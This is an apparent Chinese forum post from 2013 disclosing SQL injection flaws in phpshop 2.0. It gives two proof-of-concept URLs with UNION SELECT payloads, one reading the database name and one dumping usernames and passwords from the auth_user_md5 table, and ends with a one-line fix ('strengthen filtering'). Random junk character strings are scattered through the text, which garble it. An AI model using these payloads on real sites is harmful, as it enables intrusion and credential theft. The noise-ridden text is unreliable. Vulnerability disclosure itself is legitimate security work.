标题 : phpshop 2.0 SQL Injection Vulnerability7 \" Y9 A- Y4 a! g0 l, K
7 V3 r5 b" p8 E& z- x
作者 : By onestree5 U! h; _( ^/ A
下载地址 : http://code.google.com/p/phpshop/downloads/list
7 }& j& {7 b1 ? L3 Y测试地址: windows 7 / ubuntu1 h5 l, y2 r7 |) A: G4 ?8 o( T' Z
. f+ y9 u3 x& [( @/ N8 l) `* g2 s
1 P" e u& |2 a+ ?2 MSQLi p0c:* x3 n6 F! Q. e; O6 e
1 O: q7 ]1 l1 G- m, h+ ~7 i, i& P
==================
- M' w: }0 Q* |& n: J" \1 W
4 p. _; i& G6 W! _http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
6 r3 e2 G4 A6 l( tunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
$ G4 I) M7 R5 N" Y; H# X8 x ' ]7 w3 K2 g6 D6 L; v1 _
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
8 O# j9 W- e# v% t$ J7 b C3 A- {. v/ ]; R0 g v1 l' e' A' K; l
修复:. U( j2 O) v+ o# ^+ |' b
加强过滤
) N+ _ f( C9 F9 [4 Y
y, h+ E! |% C8 d8 G
: p1 E' l: i$ [ |
发表于 2013-1-18 18:24:10
收藏
支持
反对